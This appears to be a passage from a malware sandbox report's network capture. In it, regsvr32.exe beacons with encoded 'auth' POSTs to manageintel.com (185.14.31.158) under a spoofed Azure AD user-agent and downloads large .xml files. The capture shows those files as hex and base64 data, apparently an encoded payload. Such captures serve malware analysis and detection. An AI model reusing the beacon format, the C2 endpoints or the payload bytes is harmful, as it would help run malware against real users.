Jan 30, 2022 13:33:57.951225996 CET | 14264 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:00 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49845 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:33:58.124320984 CET | 14265 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:33:58.373992920 CET | 14266 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:00 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49846 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:33:58.580157042 CET | 14267 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:33:58.817459106 CET | 14267 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:01 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49847 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:33:59.288182974 CET | 14268 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:33:59.512347937 CET | 14268 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:02 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49759 | 185.14.31.158 | 443 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-30 12:30:34 UTC | 0 | OUT | GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1
Host: manageintel.com
Cache-Control: no-cache
2022-01-30 12:30:34 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:30:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
Last-Modified: Wed, 05 Jan 2022 22:25:50 GMT
ETag: "240c8-5d4dd3c71c40d"
Accept-Ranges: bytes
Content-Length: 147656
Connection: close
Content-Type: application/xml


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.2.349761185.14.31.158443C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-30 12:30:36 UTC | 144 | OUT | GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1
Host: manageintel.com
Cache-Control: no-cache
2022-01-30 12:30:36 UTC | 144 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:30:39 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
Last-Modified: Wed, 05 Jan 2022 22:10:13 GMT
ETag: "ab044-5d4dd04921d60"
Accept-Ranges: bytes
Content-Length: 700484
Connection: close
Content-Type: application/xml
Data Ascii: DpbwX4Y/nQGgEQogOt2i8fGK3DywoAyI17UqgF0B4PoAWD06wZl9esCB64rEZcn9y5RUovYg/v/dAeF23QGU/8VyTh1UYMwZI7SgnQcD7bAiVQYg/gNdQaAI3AzqkGxr00iZoBOKAjrHopOKEDIRhj+kqeM4FyGUF7SgnQKiwS4x0oQ/v/w/0eDklt8xD/NqLEIHFvDagxo+HQHEOgP7f7/B1+bhMrNqBdkmYhd54ld/FnoOJQPAFmF
2022-01-30 12:30:36 UTC616INData Raw: 51 63 66 5a 67 38 6f 0d 0a 57 4f 69 2f 52 33 68 55 57 42 65 59 4a 41 39 59 30 57 59 50 63 4d 44 75 38 67 39 57 31 2f 49 50 4e 59 6d 42 54 6a 44 6d 4d 55 46 46 5a 39 44 4d 42 68 42 6d 44 32 54 4b 67 65 71 50 2f 77 45 41 0d 0a 6d 6f 4b 79 75 32 2b 78 6c 55 7a 63 67 49 50 67 49 41 50 51 5a 67 56 58 2f 37 69 50 50 77 41 41 43 31 65 33 75 57 76 41 57 42 63 44 5a 68 54 79 44 31 6e 48 5a 67 56 7a 38 53 31 70 44 33 44 4a 0d 0a 4b 54 35 38 61 56 58 79 6d 30 68 48 73 41 39 59 36 6d 59 50 57 64 50 79 44 31 6a 4b 5a 67 38 55 72 54 35 38 47 4a 6a 41 57 42 65 33 4a 41 39 5a 77 47 59 50 57 50 52 6d 44 31 6e 33 38 67 39 5a 0d 0a 72 6a 35 38 4d 5a 2f 63 70 55 45 4f 68 57 59 50 63 4f 76 75 38 67 56 5a 38 2f 49 41 57 65 4e 6d 59 6a 61 4b 4a 32 64 42 6f 47 4d 78 54 57 37 53
Data Ascii: QcfZg8oWOi/R3hUWBeYJA9Y0WYPcMDu8g9W1/IPNYmBTjDmMUFFZ9DMBhBmD2TKgeqP/wEAmoKyu2+xlUzcgIPgIAPQZgVX/7iPPwAAC1e3uWvAWBcDZhTyD1nHZgVz8S1pD3DJKT58aVXym0hHsA9Y6mYPWdPyD1jKZg8UrT58GJjAWBe3JA9ZwGYPWPRmD1n38g9Zrj58MZ/cpUEOhWYPcOvu8gVZ8/IAWeNmYjaKJ2dBoGMxTW7S
2022-01-30 12:30:36 UTC632INData Raw: 2b 56 30 35 58 77 53 63 41 6a 55 58 73 69 37 53 77 41 41 41 50 61 67 35 58 42 31 6b 6a 71 63 50 77 71 4c 48 61 43 51 53 4c 38 46 46 71 44 31 32 4e 52 65 78 6c 41 56 44 6f 0d 0a 2b 70 71 4d 76 6d 50 43 32 67 31 66 45 6d 6f 51 56 34 31 46 37 47 41 42 55 4f 69 4d 77 76 2f 2f 5a 71 6a 2b 41 6c 68 69 50 55 41 41 7a 30 58 73 61 67 4a 51 36 47 58 43 2f 2f 2b 4d 78 46 41 4c 0d 0a 6e 64 55 77 64 54 68 59 57 42 6e 61 42 2b 78 71 41 6c 44 6f 57 4d 6a 2f 2f 34 50 4c 46 41 76 47 47 58 49 67 71 51 72 4d 71 4c 45 45 71 70 70 32 2f 2f 2f 2f 64 66 4c 6f 6b 6e 62 77 2f 34 50 45 0d 0a 59 64 73 2b 74 5a 65 35 47 72 49 47 71 6f 4a 32 2f 2f 2b 4c 52 66 35 5a 36 33 43 45 55 77 6a 72 5a 74 55 37 6b 65 6a 4c 58 6a 6b 2f 79 67 70 43 69 67 4b 45 77 48 2f 76 69 33 33 33 69 33 55 49
Data Ascii: +V05XwScAjUXsi7SwAAAPag5XB1kjqcPwqLHaCQSL8FFqD12NRexlAVDo+pqMvmPC2g1fEmoQV41F7GABUOiMwv//Zqj+AlhiPUAAz0XsagJQ6GXC//+MxFALndUwdThYWBnaB+xqAlDoWMj//4PLFAvGGXIgqQrMqLEEqpp2////dfLoknbw/4PEYds+tZe5GrIGqoJ2//+LRf5Z63CEUwjrZtU7kejLXjk/ygpCigKEwH/vi333i3UI
2022-01-30 12:30:36 UTC648INData Raw: 46 79 58 52 31 67 36 57 30 6c 61 65 4d 51 56 76 4e 33 4d 72 71 63 76 37 2f 2f 32 6f 4b 57 76 33 69 41 34 57 37 2b 50 2f 2f 0d 0a 35 4e 7a 4f 63 5a 62 4e 71 4d 32 46 51 6b 65 4a 6c 62 54 34 2f 2f 55 37 2b 58 58 57 69 37 32 34 6c 61 65 4d 78 4c 70 47 46 38 58 53 62 76 37 2f 2f 34 50 34 63 33 6b 50 69 5a 53 4b 4d 50 37 2f 0d 0a 6b 71 66 32 62 5a 62 4e 71 4b 56 78 63 63 42 51 69 59 57 63 39 76 58 2f 69 59 55 6a 2f 76 2f 2f 34 4e 33 54 74 35 66 4e 42 38 50 53 63 76 37 2f 2f 31 5a 51 36 42 48 53 2f 76 2b 4d 78 42 43 4e 0d 0a 36 41 53 50 76 70 64 69 32 73 74 37 76 50 2f 2f 55 4f 68 75 7a 50 54 2f 57 56 6d 45 6a 5a 7a 34 6b 71 63 5a 53 7a 49 4a 6c 55 48 53 42 41 45 41 41 49 75 46 58 50 62 2f 2f 34 31 32 41 66 2b 46 0d 0a 2b 61 43 4d 76 71 34 7a 5a 73 66 71 2b 76
Data Ascii: FyXR1g6W0laeMQVvN3Mrqcv7//2oKWv3iA4W7+P//5NzOcZbNqM2FQkeJlbT4//U7+XXWi724laeMxLpGF8XSbv7//4P4c3kPiZSKMP7/kqf2bZbNqKVxccBQiYWc9vX/iYUj/v//4N3Tt5fNB8PScv7//1ZQ6BHS/v+MxBCN6ASPvpdi2st7vP//UOhuzPT/WVmEjZz4kqcZSzIJlUHSBAEAAIuFXPb//412Af+F+aCMvq4zZsfq+v
2022-01-30 12:30:36 UTC664INData Raw: 79 2f 33 45 6a 61 77 2b 33 30 43 50 57 77 65 67 45 71 41 52 37 41 34 50 4b 0d 0a 5a 66 42 37 4e 57 75 78 6e 55 72 2f 55 6e 51 44 67 38 6f 43 71 43 70 30 41 67 76 5a 71 41 4a 30 62 31 4f 6b 54 73 5a 76 72 38 55 53 75 6f 50 67 77 49 6c 46 39 41 57 75 56 66 53 45 52 66 69 6f 0d 0a 55 69 78 62 79 71 41 52 6d 59 2b 32 52 71 67 45 64 41 4f 44 79 51 4b 6f 43 48 51 4d 67 38 6b 45 78 55 67 48 51 75 76 37 56 65 5a 33 4e 67 49 4c 7a 71 67 43 64 41 67 4c 7a 77 76 46 69 38 46 66 0d 0a 68 6d 51 56 79 69 58 4f 5a 49 36 68 67 7a 39 30 4d 51 2b 33 77 53 6e 47 77 65 41 4c 39 73 45 45 47 56 76 77 69 57 44 45 6c 6b 59 6a 51 59 50 49 42 50 62 42 45 48 34 44 67 38 67 4e 39 73 45 67 0d 0a 47 56 70 34 68 35 37 7a 56 54 70 53 54 77 41 41 43 41 42 65 79 63 6d 4c 2f 31 57 45 37 49
Data Ascii: y/3Ejaw+30CPWwegEqAR7A4PKZfB7NWuxnUr/UnQDg8oCqCp0AgvZqAJ0b1OkTsZvr8USuoPgwIlF9AWuVfSERfioUixbyqARmY+2RqgEdAODyQKoCHQMg8kExUgHQuv7VeZ3NgILzqgCdAgLzwvFi8FfhmQVyiXOZI6hgz90MQ+3wSnGweAL9sEEGVvwiWDElkYjQYPIBPbBEH4Dg8gN9sEgGVp4h57zVTpSTwAACABeycmL/1WE7I
2022-01-30 12:30:36 UTC680INData Raw: 4c 54 62 7a 6d 76 30 2f 37 0d 0a 6b 74 50 2b 6f 5a 62 4e 71 4b 65 54 46 76 76 2f 69 30 32 34 36 61 5a 50 2b 2f 2b 43 6a 52 54 2f 6b 71 65 61 38 44 7a 4a 71 4d 58 61 68 76 37 2f 2f 2b 6d 6d 56 50 48 2f 69 30 32 37 36 59 35 50 0d 0a 6c 71 66 34 7a 4e 54 4d 71 4c 47 2b 30 56 54 37 2f 34 32 4e 48 50 54 2f 2f 2b 6d 48 56 50 76 2f 35 74 58 62 76 35 66 4e 76 6a 4d 44 75 66 2b 4c 6a 61 44 2b 2f 2f 58 70 63 6c 54 30 2f 34 32 4e 0d 0a 61 61 61 4d 76 6f 46 56 41 37 57 6f 79 59 32 51 2f 76 2f 2f 36 56 5a 55 2b 2f 2b 45 6a 59 6a 2b 6b 71 65 61 45 44 7a 4a 71 4d 50 61 72 76 33 2f 2f 2b 6c 47 56 50 48 2f 69 34 31 33 2f 76 2f 2f 0d 0a 68 47 4d 6e 75 70 65 35 32 69 61 70 76 66 2f 70 4d 46 54 37 2f 34 47 4e 57 50 37 77 2f 2b 6b 6c 4f 61 4f 4d 79 75 56 36 71 62 47 6f 71 78
Data Ascii: LTbzmv0/7ktP+oZbNqKeTFvv/i0246aZP+/+CjRT/kqea8DzJqMXahv7//+mmVPH/i0276Y5Plqf4zNTMqLG+0VT7/42NHPT//+mHVPv/5tXbv5fNvjMDuf+LjaD+//XpclT0/42NaaaMvoFVA7WoyY2Q/v//6VZU+/+EjYj+kqeaEDzJqMParv3//+lGVPH/i413/v//hGMnupe52iapvf/pMFT7/4GNWP7w/+klOaOMyuV6qbGoqx
2022-01-30 12:30:36 UTC696INData Raw: 4f 4e 6e 71 78 7a 63 42 2f 68 51 36 48 2f 50 2f 66 58 47 67 45 53 6c 42 78 41 41 68 70 37 34 70 44 58 78 6d 34 49 43 79 65 79 44 37 41 67 50 56 38 70 6d 44 78 4e 4b 2b 4f 73 53 0d 0a 35 68 32 4c 77 71 67 7a 33 41 4f 72 77 64 45 41 69 55 58 34 69 55 66 38 67 33 33 7a 41 48 63 69 48 31 37 77 50 4a 41 76 4a 46 51 39 51 6d 6f 42 69 31 58 38 55 6f 46 46 2b 46 44 6e 4c 38 2f 39 0d 0a 6b 70 37 7a 6c 63 67 31 52 30 36 38 68 49 76 6c 58 63 50 4d 7a 46 2b 4c 37 49 50 6a 43 41 39 58 72 54 35 38 55 69 33 4b 76 46 7a 63 42 2f 69 44 77 41 47 4c 54 66 61 44 30 51 43 47 52 66 69 4a 0d 0a 49 4b 54 77 50 4a 51 79 49 47 77 6c 52 49 4e 39 2b 41 52 7a 47 6d 41 41 61 67 47 45 56 66 78 53 35 68 32 4c 45 59 44 74 6d 62 4f 6f 68 49 42 77 6f 67 63 51 41 4f 48 47 69 2b 56 53 77 38
Data Ascii: ONnqxzcB/hQ6H/P/fXGgESlBxAAhp74pDXxm4ICyeyD7AgPV8pmDxNK+OsS5h2Lwqgz3AOrwdEAiUX4iUf8g33zAHciH17wPJAvJFQ9QmoBi1X8UoFF+FDnL8/9kp7zlcg1R068hIvlXcPMzF+L7IPjCA9XrT58Ui3KvFzcB/iDwAGLTfaD0QCGRfiJIKTwPJQyIGwlRIN9+ARzGmAAagGEVfxS5h2LEYDtmbOohIBwogcQAOHGi+VSw8
2022-01-30 12:30:36 UTC712INData Raw: 50 38 44 41 41 41 4b 41 41 41 41 66 56 68 7a 51 57 55 79 56 30 35 67 51 67 41 41 45 77 41 41 41 47 34 4a 41 41 41 66 41 41 41 41 0d 0a 2f 46 68 7a 51 55 45 79 56 30 35 63 51 77 41 41 46 67 41 41 41 48 6f 41 41 41 41 54 41 41 41 41 50 56 68 7a 51 58 6b 79 56 30 35 56 51 67 41 41 41 67 41 41 41 43 30 41 41 41 41 54 41 41 41 41 0d 0a 59 56 68 7a 51 57 55 79 56 30 35 59 51 67 41 41 45 77 41 41 41 41 73 41 41 41 41 6e 41 41 41 41 61 31 68 7a 51 58 34 79 56 30 34 73 51 67 41 41 41 67 41 41 41 46 30 41 41 41 41 5a 41 41 41 41 0d 0a 54 46 68 7a 51 55 38 79 56 30 36 44 51 67 41 41 4a 77 41 41 41 49 6b 41 41 41 41 5a 41 41 41 41 69 31 74 7a 51 57 55 79 56 30 35 66 51 67 41 41 44 41 41 41 41 42 38 41 41 41 41 45 41 41 41 41 0d 0a 66 46 68 7a 51 58 6f 79 56 30 35 6c
Data Ascii: P8DAAAKAAAAfVhzQWUyV05gQgAAEwAAAG4JAAAfAAAA/FhzQUEyV05cQwAAFgAAAHoAAAATAAAAPVhzQXkyV05VQgAAAgAAAC0AAAATAAAAYVhzQWUyV05YQgAAEwAAAAsAAAAnAAAAa1hzQX4yV04sQgAAAgAAAF0AAAAZAAAATFhzQU8yV06DQgAAJwAAAIkAAAAZAAAAi1tzQWUyV05fQgAADAAAAB8AAAAEAAAAfFhzQXoyV05l
2022-01-30 12:30:36 UTC728INData Raw: 55 67 79 4c 6b 34 34 51 6e 55 41 63 67 41 67 41 48 6f 41 63 67 42 67 41 47 63 41 0d 0a 48 31 67 53 51 51 55 79 64 30 34 30 51 6d 45 41 62 67 41 67 41 47 6b 41 59 51 42 36 41 48 4d 41 43 46 68 54 51 51 6b 79 4f 55 35 33 51 6d 45 41 63 77 42 7a 41 47 38 41 63 67 42 37 41 47 6b 41 0d 0a 41 6c 67 64 51 57 49 79 4d 55 34 32 51 6d 6b 41 62 41 42 31 41 48 67 41 5a 51 41 6a 41 43 41 41 48 6c 67 57 51 51 30 79 64 30 34 6a 51 6d 67 41 5a 51 41 67 41 46 77 41 61 51 42 38 41 48 55 41 0d 0a 44 46 67 66 51 55 67 79 46 45 35 38 51 69 73 41 49 41 42 6b 41 47 55 41 59 77 42 36 41 47 30 41 43 46 67 64 51 52 77 79 4e 6b 34 6a 51 6d 6b 41 62 77 42 75 41 43 6f 41 62 77 42 68 41 43 41 41 0d 0a 44 46 67 41 51 52 73 79 4d 6b 34 6c 51 6e 51 41 63 77 41 41 41 43 49 41 55 41 42 39
Data Ascii: UgyLk44QnUAcgAgAHoAcgBgAGcAH1gSQQUyd040QmEAbgAgAGkAYQB6AHMACFhTQQkyOU53QmEAcwBzAG8AcgB7AGkAAlgdQWIyMU42QmkAbAB1AHgAZQAjACAAHlgWQQ0yd04jQmgAZQAgAFwAaQB8AHUADFgfQUgyFE58QisAIABkAGUAYwB6AG0ACFgdQRwyNk4jQmkAbwBuACoAbwBhACAADFgAQRsyMk4lQnQAcwAAACIAUAB9
2022-01-30 12:30:36 UTC744INData Raw: 47 38 45 41 41 44 66 36 41 59 51 0d 0a 42 6c 78 7a 51 59 6a 61 55 56 34 37 52 67 41 41 38 4f 67 47 45 49 73 45 41 41 44 7a 36 41 59 51 62 46 42 7a 51 57 44 62 55 56 35 54 53 67 41 41 50 4d 34 47 45 41 30 49 41 41 41 62 36 51 59 51 0d 0a 5a 46 42 7a 51 55 6a 62 55 56 35 64 53 67 41 41 4c 4f 6b 47 45 41 59 49 41 41 41 33 36 51 59 51 66 56 42 7a 51 53 7a 62 55 56 35 45 53 67 41 41 55 4f 6b 47 45 42 34 49 41 41 42 54 36 51 59 51 0d 0a 65 31 42 7a 51 51 44 62 55 56 35 4e 53 67 41 41 64 4f 6b 47 45 42 63 49 41 41 43 44 36 51 59 51 51 56 42 7a 51 66 44 62 55 56 35 73 53 67 41 41 73 4f 6b 47 45 44 51 49 41 41 43 7a 36 51 59 51 0d 0a 4c 6c 42 7a 51 61 44 62 55 56 34 38 53 67 41 41 34 4f 6b 47 45 41 73 4d 41 41 44 2f 36 51 59 51 61 56 52 7a 51 5a 54 62 55 56 35 51
Data Ascii: G8EAADf6AYQBlxzQYjaUV47RgAA8OgGEIsEAADz6AYQbFBzQWDbUV5TSgAAPM4GEA0IAAAb6QYQZFBzQUjbUV5dSgAALOkGEAYIAAA36QYQfVBzQSzbUV5ESgAAUOkGEB4IAABT6QYQe1BzQQDbUV5NSgAAdOkGEBcIAACD6QYQQVBzQfDbUV5sSgAAsOkGEDQIAACz6QYQLlBzQaDbUV48SgAA4OkGEAsMAAD/6QYQaVRzQZTbUV5Q
2022-01-30 12:30:36 UTC760INData Raw: 6e 66 56 44 71 4c 6e 46 32 56 53 68 37 50 63 31 49 50 51 6f 41 49 4a 61 37 6b 58 6f 2f 31 7a 78 66 42 6e 66 7a 46 58 4e 58 51 74 54 43 4e 6b 74 37 50 39 69 64 38 75 70 4b 43 55 30 39 0d 0a 62 56 6a 6e 67 39 59 32 4b 33 45 67 2f 44 4f 49 4d 65 63 68 50 51 6f 41 74 4a 56 44 76 6e 77 2f 30 71 41 74 55 54 41 66 45 58 4e 58 51 70 67 38 34 48 64 39 50 7a 6f 63 6b 4a 34 75 68 55 38 39 0d 0a 62 56 6a 54 39 68 45 44 4b 58 45 72 59 4d 53 76 2b 31 45 38 50 51 6f 41 4a 41 63 57 36 33 34 2f 31 36 73 59 79 41 34 31 46 33 4e 58 51 6f 51 72 76 71 52 2f 50 35 59 58 75 6d 4b 4d 56 55 4d 39 0d 0a 62 56 6a 6a 30 31 77 64 31 33 46 39 7a 30 74 66 79 7a 77 71 50 51 6f 41 50 4a 72 5a 64 49 41 2f 75 46 36 2f 7a 42 41 35 48 6e 4e 58 51 67 34 79 73 64 47 41 50 33 31 5a 7a 31 59 71
Data Ascii: nfVDqLnF2VSh7Pc1IPQoAIJa7kXo/1zxfBnfzFXNXQtTCNkt7P9id8upKCU09bVjng9Y2K3Eg/DOIMechPQoAtJVDvnw/0qAtUTAfEXNXQpg84Hd9PzockJ4uhU89bVjT9hEDKXErYMSv+1E8PQoAJAcW634/16sYyA41F3NXQoQrvqR/P5YXumKMVUM9bVjj01wd13F9z0tfyzwqPQoAPJrZdIA/uF6/zBA5HnNXQg4ysdGAP31Zz1Yq
2022-01-30 12:30:36 UTC776INData Raw: 51 50 77 6f 41 41 41 44 76 74 4d 38 2f 62 56 68 7a 51 59 69 47 6d 48 46 58 51 67 41 41 67 47 2f 50 50 77 6f 41 41 41 43 50 62 38 38 2f 0d 0a 62 56 68 7a 51 55 67 59 6d 48 46 58 51 67 41 41 49 43 72 50 50 77 6f 41 41 41 44 50 35 4d 34 2f 62 56 68 7a 51 61 6a 57 6d 58 46 58 51 67 41 41 59 4a 2f 4f 50 77 6f 41 41 41 42 76 6e 38 34 2f 0d 0a 62 56 68 7a 51 57 68 6f 6d 58 46 58 51 67 41 41 41 46 72 4f 50 77 6f 41 41 41 43 66 47 38 34 2f 62 56 68 7a 51 66 67 70 6d 58 46 58 51 67 41 41 4d 4e 62 4e 50 77 6f 41 41 41 41 2f 31 73 30 2f 0d 0a 62 56 68 7a 51 61 69 6c 6d 6e 46 58 51 67 41 41 77 4a 66 4e 50 77 6f 41 41 41 42 66 57 63 30 2f 62 56 68 7a 51 54 68 72 6d 6e 46 58 51 67 41 41 34 42 72 4e 50 77 6f 41 41 41 44 76 47 73 30 2f 0d 0a 62 56 68 7a 51 51 6a 52 6d 33
Data Ascii: QPwoAAADvtM8/bVhzQYiGmHFXQgAAgG/PPwoAAACPb88/bVhzQUgYmHFXQgAAICrPPwoAAADP5M4/bVhzQajWmXFXQgAAYJ/OPwoAAABvn84/bVhzQWhomXFXQgAAAFrOPwoAAACfG84/bVhzQfgpmXFXQgAAMNbNPwoAAAA/1s0/bVhzQailmnFXQgAAwJfNPwoAAABfWc0/bVhzQThrmnFXQgAA4BrNPwoAAADvGs0/bVhzQQjRm3
2022-01-30 12:30:36 UTC792INData Raw: 31 55 58 73 79 56 30 34 4f 53 51 59 51 46 41 41 41 41 47 34 4c 42 68 41 50 41 41 41 41 0d 0a 41 6c 4e 31 55 58 34 79 56 30 34 74 53 51 59 51 46 77 41 41 41 49 38 4c 42 68 41 58 41 41 41 41 2f 56 4e 31 55 57 67 79 56 30 37 4d 53 51 59 51 47 67 41 41 41 4b 77 4c 42 68 41 55 41 41 41 41 0d 0a 33 46 4e 31 55 58 51 79 56 30 37 72 53 51 59 51 41 41 41 41 41 4d 30 4c 42 68 41 52 41 41 41 41 76 31 4e 31 55 58 63 79 56 30 36 4b 53 51 59 51 49 41 41 41 41 4f 49 4c 42 68 41 50 41 41 41 41 0d 0a 6e 6c 4e 31 55 55 6f 79 56 30 36 70 53 51 59 51 49 77 41 41 41 41 4d 4d 42 68 41 72 41 41 41 41 65 56 52 31 55 55 6f 33 78 46 64 78 51 67 41 41 41 47 30 48 45 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 51 41 41 41 50 58 2f 2f 2f
Data Ascii: 1UXsyV04OSQYQFAAAAG4LBhAPAAAAAlN1UX4yV04tSQYQFwAAAI8LBhAXAAAA/VN1UWgyV07MSQYQGgAAAKwLBhAUAAAA3FN1UXQyV07rSQYQAAAAAM0LBhARAAAAv1N1UXcyV06KSQYQIAAAAOILBhAPAAAAnlN1UUoyV06pSQYQIwAAAAMMBhArAAAAeVR1UUo3xFdxQgAAAG0HEAoAAAAPAAAAbVhzQWgyV05XQgAAAQAAAPX///
2022-01-30 12:30:36 UTC808INData Raw: 41 41 4d 77 77 46 6a 49 2b 4d 70 59 79 0d 0a 33 47 71 31 64 4d 59 45 34 48 5a 78 66 67 41 41 41 46 41 41 41 43 6f 41 41 41 41 4a 4d 59 41 7a 75 32 74 56 64 78 34 45 6b 58 5a 42 65 32 59 37 74 6a 73 47 50 6c 77 2b 41 41 41 50 59 41 41 41 0d 0a 54 56 68 7a 51 63 34 43 6f 58 35 70 63 5a 59 7a 44 6a 5a 6d 4e 72 77 34 42 6a 6c 33 4f 39 59 37 6d 32 64 7a 51 57 68 43 56 30 35 4c 51 67 41 41 6c 6a 41 30 4d 55 77 78 51 44 52 5a 4e 78 59 34 0d 0a 75 32 41 6c 65 37 34 4a 6b 58 4e 58 77 67 41 41 48 41 41 41 41 41 77 77 52 6a 4a 5a 4e 43 59 33 7a 6d 44 51 65 31 51 4f 30 58 4e 78 66 4d 59 2b 41 4a 41 41 41 45 49 41 41 41 42 70 4d 4a 59 79 0d 0a 67 6d 75 48 63 6d 45 47 51 6e 70 4e 64 6c 67 32 58 54 62 33 4e 76 59 32 4a 6a 6d 77 4f 63 51 35 53 32 4b 79 65 36 34 49 63 58
Data Ascii: AAMwwFjI+MpYy3Gq1dMYE4HZxfgAAAFAAACoAAAAJMYAzu2tVdx4EkXZBe2Y7tjsGPlw+AAAPYAAATVhzQc4CoX5pcZYzDjZmNrw4Bjl3O9Y7m2dzQWhCV05LQgAAljA0MUwxQDRZNxY4u2Ale74JkXNXwgAAHAAAAAwwRjJZNCY3zmDQe1QO0XNxfMY+AJAAAEIAAABpMJYygmuHcmEGQnpNdlg2XTb3NvY2JjmwOcQ5S2Kye64IcX
2022-01-30 12:30:36 UTC824INData Raw: 57 66 62 66 74 67 4e 37 33 47 58 66 63 67 2f 30 44 2f 59 50 2b 6f 2f 36 44 2f 2f 50 2f 67 2f 62 61 68 31 51 55 51 7a 56 30 35 58 63 67 67 77 45 44 41 59 4d 43 6f 77 4b 44 41 2f 4d 44 67 77 0d 0a 4c 57 67 37 63 54 67 43 44 33 34 33 63 6d 67 77 63 44 42 34 4d 49 6f 77 69 44 43 66 4d 4a 67 77 7a 57 6a 62 63 64 67 43 37 33 36 58 63 73 67 77 30 44 44 59 4d 4f 6f 77 36 44 44 2f 4d 50 67 77 0d 0a 62 57 6c 37 63 48 67 44 54 33 39 33 63 79 67 78 4d 44 45 34 4d 55 6f 78 53 44 46 66 4d 56 67 78 44 57 6b 62 63 42 67 44 4c 33 2f 58 63 34 67 78 6b 44 47 59 4d 61 6f 78 71 44 47 2f 4d 62 67 78 0d 0a 72 57 6d 37 63 4c 67 44 6a 33 2b 33 63 2b 67 78 38 44 48 34 4d 51 6f 79 43 44 49 66 4d 68 67 79 54 57 70 62 63 31 67 41 62 33 77 58 63 45 67 79 55 44 4a 59 4d 6d 6f 79 61 44
